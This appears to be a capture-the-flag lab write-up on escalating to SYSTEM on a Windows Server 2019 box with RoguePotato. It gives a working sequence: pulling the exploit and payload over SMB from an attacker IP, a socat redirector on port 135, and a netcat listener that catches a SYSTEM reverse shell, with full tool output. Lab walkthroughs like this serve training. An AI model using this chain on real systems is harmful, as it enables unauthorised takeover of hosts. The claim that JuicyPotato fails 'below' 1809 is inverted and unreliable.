Rogue Potato
JuicyPotato does not work on anything below Windows 10 1809 & Windows Server 2019
the target system is windows server 2019, so i will be using an alternative; roguepotato
- Rogue Potato instruct the DCOM server to perform a remote OXID query by specifying a remote IP (Attacker IP)
- On the remote IP, setup a “socat” listener for redirecting the OXID resolutions requests to a fake OXID RPC Server
- the fake oxid rpc server implements the resolveoxid2 server procedure, which will point to a controlled named pipe
ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper] - The DCOM server will connect to the RPC server in order to perform the IRemUnkown2 interface call. By connecting to the Named Pipe, an “Autentication Callback” will be performed and we could impersonate the caller via RpcImpersonateClient() call.
- then, a token stealer will:
- Get the PID of the rpcss service
- Open the process, list all handles and for each handle try to duplicate it and get the handle type
- If handle type is “Token” and token owner is SYSTEM, try to impersonate and launch a process with CreatProcessAsUser() or CreateProcessWithToken()
What do you need to make it work?
- You need to have a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim
- upload both exe files from the poc. In fact it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine under our control when the victim’s firewall won’t accept incoming connections. more info: https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
Exploit
Exploit found online from the official GitHub repository
Exploitation
ps c:\tmp> copy \\10.10.14.5\smb\potato\RoguePotato.exe .
ps c:\tmp> copy \\10.10.14.5\smb\potato\pe.exe .I transferred both the exploit and payload over SMB
┌──(kali㉿kali)-[~/…/htb/labs/remote/potato]
└─$ socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:38843Initiating the network redirector locally on Kali Whatever coming in through port 135 gets forwarded to the target port 38843
ps c:\tmp> .\RoguePotato.exe -r 10.10.14.5 -e "C:\tmp\pe.exe" -l 38843
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] calling cogetinstancefromistorage with clsid:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 38843 ...
[*] istoragetrigger written:102 bytes
[*] SecurityCallback RPC call
[*] ServerAlive2 RPC Call
[*] SecurityCallback RPC call
[*] ResolveOxid2 RPC call, this is for us!
[*] resolveoxid2: returned endpoint binding information = ncacn_np:localhost/pipe/RoguePotato[\pipe\epmapper]
[*] Client connected!
[+] Got SYSTEM Token!!!
[*] token has se_assign_primary_name, using createprocessasuser() for launching: C:\tmp\pe.exe
[+] roguepotato gave you the system powerz :DExecuting the RoguePotato with
-rset to set to the remote IP to Kali-lset to 9999 to receive the forwarded OXID Resolver Request-eset to launch the payload (c:\tmp\pe.exe) upon successful exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49774
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\tmp> whoami
nt authority\system
ps c:\tmp> hostname
remote
ps c:\tmp> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::ba
ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
ipv4 address. . . . . . . . . . . : 10.10.10.180
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
10.10.10.2System Level Compromise